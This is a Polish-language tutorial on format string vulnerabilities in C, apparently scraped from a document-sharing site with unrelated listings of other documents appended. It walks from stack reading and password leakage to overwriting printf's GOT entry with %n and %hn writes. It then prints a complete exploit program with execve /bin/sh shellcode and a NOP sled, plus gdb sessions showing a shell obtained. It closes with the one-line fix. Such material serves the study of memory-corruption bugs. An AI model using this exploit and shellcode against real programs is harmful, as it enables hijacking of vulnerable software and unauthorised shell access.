Błędy łańcuchów formatujących (format string) by h07

Wielkość: px
Rozpocząć pokaz od strony:

Download "Błędy łańcuchów formatujących (format string) by h07 (h07@interia.pl)"

Transkrypt

1 Błędy łańcuchów formatujących (format string) by h07 Intro. Łańcuchy formatujące umieszczone w funkcjach z rodziny printf() (lub innych funkcjach, których parametrem jest łańcuch formatujący) umoŝliwiają wypełnianie łańcuchów znakowych odpowiednimi danymi. Przykład.. //printf.c int main() int cena = 65; printf("ksiazka kosztuje %d zl\n", cena); return 0; format]$ gcc -o printf printf.c format]$./printf Ksiazka kosztuje 65 zl Rezultatem działania przykładowego programu printf.c jest wyświetlenie łańcucha znakowego wypełnionego danymi w sposób określony przez programistę. Specyfikator %d umoŝliwia wyświetlenie wartości typu całkowitego w systemie dziesiętnym. W naszym przypadku argumentem specyfikatora %d była zmienna int cena. Błędy łańcuchów formatujących występują wówczas, gdy ilość specyfikatorów jest większa od ilości odpowiadających im argumentów. Brakujące wartości pobierane są ze stosu co w rezultacie umoŝliwia hakerowi podejrzenie zawartości stosu w celu odczytania istotnych danych lub przejęcia kontroli nad wykonywaniem programu. Podgląd zawartości stosu. Przykładowy program fmt.c podatny jest na atak ciągu formatującego. UŜyta w nim funkcja snprintf() nie zawiera formatera, co w rezultacie daje nam moŝliwość wprowadzenia z zewnątrz własnego łańcucha formatującego. //fmt.c int main(int argc, char *argv[]) char buffer[512]; if(argc > 1) snprintf(buffer, sizeof(buffer) -1, argv[1]); printf("%s\n", buffer);

2 return 0; format]$ gcc -o fmt fmt.c format]$./fmt "%d %d %d %d %d %d %d %d %d %d" Do programu fmt.c wprowadzono 10 specyfikatorów %d, dla których nie określono argumentów zawierających wartości całkowite. Konsekwencją tego było odczytanie brakujących danych ze stosu i wyświetlenie ich w systemie dziesiętnym Specyfikator %x umoŝliwia wyświetlenie wartości w systemie 16-stkowym. format]$./fmt "%x %x %x %x %x %x %x %x %x %x" MoŜliwe jest zatem pobieranie danych ze stosu ale jak praktycznie to wykorzystać? //format.c int main(int argc, char *argv[]) char buffer[150]; char *password = "hello world"; if(argc == 1 strlen(argv[1]) > 100) printf("usege: %s <password>\n", argv[0]); exit(0); if(strcmp(argv[1], password) == 0) printf("password ok\n"); else sprintf(buffer, "Access denied, bad password: %s\n", argv[1]); printf(buffer); return 0; Powyzszy program podatny jest na błąd łańcucha formatującego. Standardowo weryfikuje on poprawność hasła, po czym wyświetla stosowny komunikat. Jeśli w tablicy argv[1] umieścimy dodatkowe specyfikatory to brakujące dane zostaną pobrane ze stosu (w tym nasz tajne hasło hello world ). Aby odczytać dane ze stosu w postaci łańcucha znakowego posłuŝymy się specyfikatorem %s, którego argument jest wskaźnikiem do łańcucha znaków. format]$ for((i = 1; i <= 30; i++)); do echo -n "[$i] : " &&./format "[%$i\$x] = '%$i\$s'"; done [1] : Access denied, bad password: [ ] = 'Access denied, bad password: %s '

3 [2] : Access denied, bad password: [bffff80f] = '[%2$x] = '%2$s'' [3] : Segmentation fault [4] : Access denied, bad password: [0] = '(null)' [5] : Access denied, bad password: [0] = '(null)' [6] : Access denied, bad password: [40033bcc] = '' [7] : Access denied, bad password: [4002ebb4] = '' [8] : Access denied, bad password: [ ] = '' [9] : Access denied, bad password: [ ] = '' [10] : Segmentation fault [11] : Access denied, bad password: [80485e8] = 'hello world' [12] : Segmentation fault [13] : Segmentation fault [14] : Segmentation fault [15] : Segmentation fault [16] : Segmentation fault [17] : Segmentation fault [18] : Segmentation fault [19] : Segmentation fault [20] : Segmentation fault [21] : Segmentation fault [22] : Segmentation fault [23] : Segmentation fault '24] : Access denied, bad password: [ ] = ii [25] : Segmentation fault [26] : Access denied, bad password: [0] = '(null)' [27] : Segmentation fault [28] : Access denied, bad password: [ ] = [29] : Access denied, bad password: [0] = '(null)' [30] : Access denied, bad password: [bffff5a4] = ' ı ' Wykonując powyŝsze polecenie odczytaliśmy dane ze stosu (przesuniecie względem szczytu stosu określane jest poprzez zmienną iteracyjną i). Korzystając ze specyfikatorów %x i %s ("[%$i\$x] = '%$i\$s'") odczytaliśmy zarówno wartości szesnastkowe jak i łańcuchy znakowe. Nasze tajne hasło zostało odczytane podczas 11 iteracji pętli [11] : Access denied, bad password: [80485e8] = 'hello world' MoŜemy teraz odczytać nasze hasło stosując metodę bezpośredniego dostępu do parametru. format]$./format "%11\$s" Access denied, bad password: hello world format]$./format "hello world" Password ok Przejęcie kontroli nad wykonywaniem programu. Wykorzystanie błędów łańcuchów formatujących do przejęcia kontroli nad wykonywaniem programu nie jest rzeczą łatwą. Przede wszystkim musimy zapoznać się ze specyfikatorem %n. Ów specyfikator umieszcza ilość wyprowadzonych przed nim znaków w adresie pamięci określonym przez argument. Jeśli nie określimy argumentu dla specyfikatora %n, pobierze on brakujące dane ze stosu traktując je jako adres pod którym zostanie zapisana liczba wybprowadzonych przed nim znaków. Konsekwencją tego będzie nadpisanie niedozwolonych obszarów pamięci czyli błąd segmentacji.

4 format]$./fmt "AAAA%n" Segmentation fault I co dalej? Jeśli odnajdziemy przesunięcie względem szczytu stosu, w którym znajduje się nasz łańcuch znakowy (wypełniony konkretnym adresem) wprowadzany do programu i zmusimy specyfikator %n by pobrał nasz łańcuch jako argument to da nam to moŝliwość zapisu liczby wyprowadzonych znaków przed specyfikatorem %n w dowolnym miejscu pamięci. format]$./fmt "AAAABBBB %x %x %x %x %x %x %x %x %x %x" AAAABBBB format]$./fmt "AAAA %x %x %x %x %x %x" AAAA format]$./fmt "AAAA%6\$x" AAAA Widzimy Ŝe początek naszego łańcucha znakowego znajduje się w szóstym przesunięciu względem szczytu stosu. Oznacza to, iŝ potrzebujemy sześciu specyfikatorów %x aby uzyskać 16-stkową reprezentacja łańcucha znakowego AAAA czyli UŜyjmy teraz specyfikatora %n zamiast %x i zobaczmy co się stanie. format]$ gdb fmt (gdb) r "AAAA%6\$n" Starting program: /home/h07/format/fmt "AAAA%6\$n" 0x in vfprintf () from /lib/tls/libc.so.6 (gdb) info reg eax 0xf 15 ecx 0x edx 0x0 0 ebx 0x4013f esp 0xbfffe5d0 0xbfffe5d0 ebp 0xbffff25c 0xbffff25c esi 0xbfffe5f edi 0x4 4 eip 0x x eflags 0x cs 0x ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/1i $eip 0x <vfprintf+14642>: mov %edi,(%ecx) Próbowaliśmy zapisać wartość 0x4 pod adresem 0x Przed specyfikatorem %n umieściliśmy cztery znaki (AAAA) dlatego rejestr EDI ma wartość 0x4.

5 Jednym ze sposobów zmiany sterowania programu jest modyfikacja wartości umieszczonej pod adresem funkcji znajdującej się w tabeli GOT (Global Offset Table). Do takich funkcji naleŝy między innymi funkcja printf() i pierwszym krokiem jest ustalenie jej adresu. format]$ objdump -R fmt fmt: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE e0 R_386_GLOB_DAT gmon_start d4 R_386_JUMP_SLOT libc_start_main d8 R_386_JUMP_SLOT printf dc R_386_JUMP_SLOT snprintf W naszym przypadku funkcja printf() ma adres d8. PoniewaŜ procesory zapisują adresy zaczynając od bajtów mniej znaczących musimy odwrócić kolejność bajtów adresu wprowadzanego do łańcucha formatującego d8 = \xd8\x95\x04\x08 Spróbujmy zatem nadpisac ten adres wartością 0x4 i zobaczmy co się stanie. format]$ gdb fmt (gdb) r $'\xd8\x95\x04\x08%6$n' Starting program: /home/h07/format/fmt $'\xd8\x95\x04\x08%6$n' 0x in?? () (gdb) info reg eax 0xbffff3b ecx 0xbffff edx 0x4 4 ebx 0x4013f esp 0xbffff38c 0xbffff38c ebp 0xbffff5b8 0xbffff5b8 esi 0xbffff edi 0xbffff5d eip 0x4 0x4 eflags 0x cs 0x ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 Bingo ;) Sterowanie zostało zmienione. Rejestr sterujący EIP przyjął wartość 0x4 co spowodowało skok do adresu 0x Dlaczego 0x4 skoro nie wprowadziliśmy znaków AAAA? PoniewaŜ przed specyfikatorem %n umieściliśmy 4-bajtowy adres \xd8\x95\x04\x08 (\bajt\bajt\bajt\bajt).

6 MoŜemy wywnioskować ze długość łańcucha formatującego w systemie dziesiętnym odpowiada wartości rejestru EIP w systemie szesnastkowym. Spróbujmy zatem nadpisać rejestr EIP wartością 0x4141. //convert.c int main() int RET = 0x4141; printf("length: %d\n", RET -4); return 0; format]$ gcc -o convert convert.c format]$./convert Length: format]$ gdb fmt (gdb) r $'\xd8\x95\x04\x08%16701x%6$n' Starting program: /home/h07/format/fmt $'\xd8\x95\x04\x08%16701x%6$n' 0x in?? () (gdb) info reg eip eip 0x4141 0x4141 Program convert.c zamienił wartość 16-stkową 0x4141 na system dziesiętny odejmując długość łańcucha formatującego czyli 4 (4-bajtowy adres) Uzyskaliśmy wartość 16701, która wprowadzona do łańcucha formatującego dała rezultat nadpisania rejestru EIP wartością 0x4141. Sytuacja nieco się komplikuje gdy chcemy nadpisac rejestr EIP pełnym (4-bajtowym) adresem np. 0x Musimy rozbić ów adres na dwie części i zapisać pierwszą z nich w adresie funkcji printf() a drugą część bezpośrednio pod tym adresem (adres funkcji printf + 2 [ d8 +2 = da = \xda\x95\x04\x08 ]). Do tego celu uŝyjemy specyfikatora %hn, który umoŝliwia zapisanie wartości 16-bitowej (2-bajtowej). jeśli A < B r $'\xda\x95\x04\x08\xd8\x95\x04\x08%( A )x%6$hn%( B A )x%7$hn' jeśli A > B r $'\xd8\x95\x04\x08\xda\x95\x04\x08%( B )x%6$n%( A B )x%7$n' PowyŜej przedstawiony został prosty schemat ustalający długość łańcucha formatującego tak by uzyskane wartości powodowały napisanie rejestru EIP konkretnym adresem. Przykład: Adres = 0x Długość łańcucha = 8 A = hex: 4141 = dec: 16705

7 B = hex: 4242 = dec: (A < B) A: = B: = 257 (gdb) r $'\xda\x95\x04\x08\xd8\x95\x04\x08%16697x%6$hn%257x%7$hn' Starting program: /home/h07/format/fmt $'\xda\x95\x04\x08\xd8\x95\x04\x08%16697x%6$hn%257x%7$hn' 0x in?? () (gdb) info reg eip eip 0x x Adres = 0x Długość łańcucha = 8 A = hex: 4242 = dec: B = hex: 4141 = dec: (A > B) B: = A: = 257 (gdb) r $'\xd8\x95\x04\x08\xda\x95\x04\x08%16697x%6$n%257x%7$n' Starting program: /home/h07/format/fmt $'\xd8\x95\x04\x08\xda\x95\x04\x08%16697x%6$n%257x%7$n' 0x in?? () (gdb) info reg eip eip 0x x Potrafimy juŝ napisać rejestr EIP dowolnym adresem więc nadszedł czas napisać exploit który wykorzysta błąd łańcucha formatującego w programie fmt.c uruchamiając kod powłoki. //exp.c (format string exploit demo) by h07 #include <stdio.h> #define BUFF_SIZE 1000 #define LEN 8 #define NOP 0x90 char buffer[buff_size]; char fmt[80]; char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89"

8 "\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x58\x59\x59\x59\x59\x5a\x5a\x5a\x5a"; unsigned long get_esp() asm ("movl %esp,%eax"); int main(int argc, char *argv[]) unsigned long RET, offset = 0; unsigned int A, B; if(argc > 1) offset = atoi(argv[1]); RET = get_esp() - offset; A = (RET & 0xffff0000) >> 16; B = (RET & 0x0000ffff); printf("\nret: 0x%x\n", RET); if(a < B) A -= LEN; sprintf(fmt, "$'\\xda\\x95\\x04\\x08\\xd8\\x95\\x04\\x08" "%%%ux%%6$hn" "%%%ux%%7$hn'", A, (B - A) -LEN); else B -= LEN; sprintf(fmt, "$'\\xd8\\x95\\x04\\x08\\xda\\x95\\x04\\x08" "%%%ux%%6$hn" "%%%ux%%7$hn'", B, (A - B) -LEN); if((sizeof(fmt) + sizeof(shellcode)) > BUFF_SIZE) printf("error: buffer too small..\n"); exit(1); memset(buffer, NOP, BUFF_SIZE -1); memcpy(buffer, "EXP=", 4); memcpy(buffer + BUFF_SIZE -1 - strlen(shellcode), shellcode, strlen(shellcode)); putenv(buffer); printf("\nformat string: %s\n\n", fmt); system("/bin/bash"); return 0;

9 Exploit ustala adres powrotny po przez odjęcie offsetu od wierzchołka stosu. Następnie uzyskany adres powrotny rozdzielany jest na dwie części (A i B) po czym następuje obliczanie długości łańcucha formatującego. Obliczone wartości nadpisują adres funkcji printf() i adres znajdujący się pod nią uzyskując 16-stkową reprezentacje adresu do którego zostanie wykonany skok. Na samym koncu tworzona jest zmienna systemowa $EXP o rozmiarze 1000 bajtów która wypełniana jest instrukcjami NOP a później shellcodem. Odpalamy exploit: format]$ gcc -o exp exp.c format]$./exp -400 RET: 0xbffff748 format string: $'\xda\x95\x04\x08\xd8\x95\x04\x08%49143x%6$hn%14153x%7$hn' format]$./fmt $'\xda\x95\x04\x08\xd8\x95\x04\x08%49143x%6$hn%14153x%7$hn' Segmentation fault format]$./exp -800 RET: 0xbffff8d8 format string: $'\xda\x95\x04\x08\xd8\x95\x04\x08%49143x%6$hn%14553x%7$hn' format]$./fmt $'\xda\x95\x04\x08\xd8\x95\x04\x08%49143x%6$hn%14553x%7$hn' sh-2.05b$ W ten oto sposób wykorzystaliśmy błąd łańcucha formatującego w programie fmt.c zmieniając jego sterowanie i uruchamiając kod powłoki znajdujący się w zmiennej systemowej $EXP. Outro. Błąd łańcucha formatującego znajdujący się w programie fmt.c jest bardzo łatwy do naprawienia. Wystarczy umieścić w funkcji snprinf() formater określający sposób formatowania danych. snprintf(buffer, sizeof(buffer) -1, argv[1]); //źle snprintf(buffer, sizeof(buffer) -1, "%s", argv[1]); //dobrze Ataki typu format string stają się coraz rzadsze. Nie znaczy to jednak ze błędy tego typu nie mają juz miejsca czego przykładem jest między innymi serwer FTP wu-ftp EoF;

część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki

część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki Język ANSI C część 5 biblioteka standardowa wejścia - wyjścia łańcuchowe wejście - wyjście Jarosław Gramacki Instytut Informatyki i Elektroniki Łańcuchowe wejście-wyjście podejście bardzo podobne do znakowego

Bardziej szczegółowo

Od matematyki do programowania. Wszystko, co każdy programista wiedzieć powinien

Od matematyki do programowania. Wszystko, co każdy programista wiedzieć powinien Idź do Spis treści Przykładowy rozdział Skorowidz Katalog książek Katalog online Zamów drukowany katalog Twój koszyk Dodaj do koszyka Cennik i informacje Zamów informacje o nowościach Zamów cennik Czytelnia

Bardziej szczegółowo

Artykuł jest skierowany przede wszystkim

Artykuł jest skierowany przede wszystkim Piszemy własny moduł PAM Andrzej Nowak Na CD: Na dołączonej do pisma płycie CD zamieszczone są wykorzystywane w artykule programy i dokumentacja. Artykuł jest skierowany przede wszystkim do administratorów

Bardziej szczegółowo

Moduł 4 - Tworzenie obiektów i metod

Moduł 4 - Tworzenie obiektów i metod MODUŁ 4 - TWORZENIE OBIEKTÓW I METOD 32 Moduł 4 - Tworzenie obiektów i metod Zawartość jednostki Po zrealizowaniu jednostki będziesz w stanie: wskazać różnice między zmienną typu prostego, a obiektem (zmienną

Bardziej szczegółowo

Temat zajęć: Obsługa procesów w systemie.

Temat zajęć: Obsługa procesów w systemie. Temat zajęć: Obsługa procesów w systemie. Czas realizacji zajęć: 90 min. Zakres materiału, jaki zostanie zrealizowany podczas zajęć: Procesy macierzyste i potomne, tworzenie procesów potomnych, uruchamianie

Bardziej szczegółowo

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL

Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL i T-SQL POLITECHNIKA WARSZAWSKA Wydział Elektroniki i Technik Informacyjnych PRACA DYPLOMOWA MAGISTERSKA Marta Bańkowska Nr albumu: 161484 Analiza porównawcza języków procedur składowanych PL/SQL, SQL PL, PL/pgSQL

Bardziej szczegółowo

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9

W skrócie 6. Zawartość CD 8. Atak. Obrona. hakin9 hakin9 Witamy! Lato w pełni i mamy nadzieję, że nasi czytelnicy podczas swoich urlopów nie zapomną o nas i zakupią lipcowy numer hakin9 jak się obronić. Gorąco polecamy artykuł z działu atak: Praktyczny

Bardziej szczegółowo

Szyfrowanie w aplikacjach biblioteka Openssl

Szyfrowanie w aplikacjach biblioteka Openssl Szyfrowanie w aplikacjach biblioteka Openssl Obrona Paweł Maziarz stopień trudności Informacja w dzisiejszych czasach to jedna z bardziej cennych rzeczy, dlatego trzeba o nią odpowiednio zadbać. Sieci

Bardziej szczegółowo

Firma 2000 Podręcznik uŝytkownika systemu

Firma 2000 Podręcznik uŝytkownika systemu Firma 2000 Podręcznik uŝytkownika systemu Wszelkie prawa zastrzeŝone. ASCO Kraków 2000-2007. ZastrzeŜonych nazw firm i produktów uŝyto wyłącznie w celu identyfikacji. 1. Wiadomości ogólne o programie

Bardziej szczegółowo

Instrukcja użytkownika. Lipiec 2013. Q - Table. Just dream IT, we do the rest.

Instrukcja użytkownika. Lipiec 2013. Q - Table. Just dream IT, we do the rest. Instrukcja użytkownika Q - Table Lipiec 2013 Program Q-Table służy do połączenia z bazą danych systemu SAP ERP. Umożliwia pobranie tabel i zapisanie ich na lokalnym dysku lub w bazie danych. Przed ściągnięciem

Bardziej szczegółowo

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci

Zespół Szkół im. Adama Wodziczki w Mosinie. Roman Zalewski Mariusz Bocian. Szkodniki komputerowe i zagroŝenia w sieci Zespół Szkół im. Adama Wodziczki w Mosinie Roman Zalewski Mariusz Bocian Szkodniki komputerowe i zagroŝenia w sieci Mosina 2005/2006 Praca wykonana podczas zajęć przedmiotu: przetwarzanie informacji w

Bardziej szczegółowo

Programowanie w jêzyku PL/SQL

Programowanie w jêzyku PL/SQL Oracle Database 11g. Programowanie w jêzyku PL/SQL Autor: Michael McLaughlin T³umaczenie: Tomasz Walczak ISBN: 978-83-246-1938-2 Tytu³ orygina³u: Oracle Database 11g PL/SQL Programming Format: 168x237,

Bardziej szczegółowo

WYSZUKIWARKA MERLIN.X & EASY-PAX

WYSZUKIWARKA MERLIN.X & EASY-PAX WYSZUKIWARKA MERLIN.X & EASY-PAX KONFIGURACJA I PODŁA CZENIE (wersja z 12.03.2013r.) 1 Spis treści I KONFIGURACJA... 5 1.Dodawanie i usuwanie afiliatu... 5 2.Ustawienia Agencji... 6 2.1. Dane Agencji...

Bardziej szczegółowo

42. Stany procesów i przejścia między nimi w wielozadaniowym systemie operacyjnym.

42. Stany procesów i przejścia między nimi w wielozadaniowym systemie operacyjnym. 42. Stany procesów i przejścia między nimi w wielozadaniowym systemie operacyjnym. Proces - to jedno z najbardziej podstawowych pojęć w informatyce. Z definicji jest to po prostu egzemplarz wykonywanego

Bardziej szczegółowo

System plików działający poza jądrem systemu operacyjnego Linux

System plików działający poza jądrem systemu operacyjnego Linux Akademia Górniczo-Hutnicza im. Stanisława Staszica wkrakowie Praca magisterska System plików działający poza jądrem systemu operacyjnego Linux Jan Wróbel Kierunek: Informatyka Specjalność: Systemy rozproszone

Bardziej szczegółowo

Postępowanie z dowodami cyfrowymi.

Postępowanie z dowodami cyfrowymi. Zwalczanie Laboratorium 7. Postępowanie z dowodami cyfrowymi. Typowym dowodem cyfrowym jest dysk zajętego komputera. Badanie zawartości dysku może odbywać się na dwa sposoby: bezpośrednio poprzez analizę

Bardziej szczegółowo

WYSZUKIWARKA MERLIN.X & EASY-PAX

WYSZUKIWARKA MERLIN.X & EASY-PAX WYSZUKIWARKA MERLIN.X & EASY-PAX KONFIGURACJA I PODŁACZENIE (wersja z 06.02.2013r.) 1 Spis treści I KONFIGURACJA...5 1.Dodawanie i usuwanie afliatu... 5 2.Ustawienia Agencji... 6 2.1. Dane Agencji...6

Bardziej szczegółowo

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Szkolenie działu KDM PCSS, Poznań, 28.02.2006r. Gerard Frankowski Zespół Bezpieczeństwa PCSS 1 Niniejsza prezentacja ma na celu zaprezentowanie

Bardziej szczegółowo

Bazy danych jak je ugryźć

Bazy danych jak je ugryźć Bazy danych jak je ugryźć Rodzaj zajęć: Wszechnica Poranna Tytuł: Bazy danych jak je ugryźć Autor: mgr inż. Andrzej Ptasznik, dr hab. inż. Zenon Gniazdowski Redaktor merytoryczny: prof. dr hab. Maciej

Bardziej szczegółowo

Deklarowanie kursora. CURSOR nazwa [ ( param1 typ1 [,param2 typ2]... ) ] [RETURN typ zwracany] IS zapytanie SQL;

Deklarowanie kursora. CURSOR nazwa [ ( param1 typ1 [,param2 typ2]... ) ] [RETURN typ zwracany] IS zapytanie SQL; Kursory Każde zapytanie SQL umieszczone w programie PLSQL jest wykonywane w tzw. obszarze roboczym lub inaczej obszarze kontekstu. PLSQL wykorzystuje ten obszar do przechowywania danych otrzymanych w wyniku

Bardziej szczegółowo

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Podręcznik dopuszczony do użytku szkolnego przez ministra właściwego do spraw oświaty i wychowania i wpisany do wykazu podręczników przeznaczonych do kształcenia ogólnego do nauczania informatyki na podstawie

Bardziej szczegółowo

Zanurzony SQL (Embedded SQL)

Zanurzony SQL (Embedded SQL) Zanurzony SQL (Embedded SQL) Język SQL jest przeznaczony dla dostępu do baz danych. Dostęp moŝe być urzeczywistni się w dwóch następnych trybach: Interaktywny dostęp przez ISQL Bezpośredni dostęp z aplikacji

Bardziej szczegółowo

SZYBKI START Datapolis Process System v 4.2.0.4294

SZYBKI START Datapolis Process System v 4.2.0.4294 Datapolis.com, ul Wiktorska 63, 02-587 Warszawa tel. (+48 22) 398-37-53; fax. (+ 48 22) 398-37-93, office@datapolis.com SZYBKI START Datapolis Process System v 4.2.0.4294 Ostatnia aktualizacja: 10 czerwca

Bardziej szczegółowo

Joomla! Zabezpieczanie witryn

Joomla! Zabezpieczanie witryn Joomla! Zabezpieczanie witryn Autor: Tom Canavan T³umaczenie: Roman Gryzowski, Tomasz Walczak ISBN: 978-83-246-2197-2 Tytu³ orygina³u: Joomla! Web Security Format: 170 230, stron: 248 Zabezpiecz stronê

Bardziej szczegółowo

Nowy ANT Studio Web 5.0

Nowy ANT Studio Web 5.0 ANT STUDIO WEB 5.0 Pomoc oprogramowania ANT Studio Web 5.0 Nowy ANT Studio Web 5.0 z technologią AJAX Web 2.0 WYRÓŻNIAJĄCE SIĘ NA RYNKU OPROGRAMOWANIE HMI/SCADA, W KTÓRYM ZBUDUJESZ JAK Z KLOCKÓW APLIKACJĘ

Bardziej szczegółowo

Administrowanie systemem operacyjnym Unix 312 [01].Z4.02

Administrowanie systemem operacyjnym Unix 312 [01].Z4.02 MINISTERSTWO EDUKACJI i NAUKI Ewa Sromala Administrowanie systemem operacyjnym Unix 312 [01].Z4.02 Poradnik dla ucznia Wydawca Instytut Technologii Eksploatacji Państwowy Instytut Badawczy Radom 2005 Recenzenci:

Bardziej szczegółowo

Aplikacja Ramzes MOBILE PRES

Aplikacja Ramzes MOBILE PRES Ramzes Sp. z o.o. Al. Jerozolimskie 214, 02-486 Warszawa NIP: 527-10-30-866 tel.: +4822 335 98 73, faks: +4822 335 99 73 http://www.ramzes.pl e-mail: ramzes@ramzes.pl Aplikacja Ramzes MOBILE PRES podręcznik

Bardziej szczegółowo

Tworzenie i edycja tabel w programie MS Access

Tworzenie i edycja tabel w programie MS Access - 1 - Tworzenie i edycja tabel w programie MS Access Utwórz nową bazę danych i zapisz pod nazwą studenci.accdb 1. Tworzenie tabel Tabela jest zbiorem danych dotyczących określonego tematu, na przykład

Bardziej szczegółowo

Podręcznik użytkownika. Terminal GUI Terminal Console V. 2.4

Podręcznik użytkownika. Terminal GUI Terminal Console V. 2.4 Dokument opisuje sposób uruchamiania aplikacji graficznych i konsolowych z oprogramowaniem OTC Terminal. Terminal GUI Terminal Console V. 2.4 Podręcznik użytkownika OTC S.A., 2008 Spis Treści I. Ogólna

Bardziej szczegółowo

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Zabezpieczanie komunikacji sieciowej przy pomocy protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Poznań, 30.01.2007 1 Witam Państwa serdecznie na szkoleniu

Bardziej szczegółowo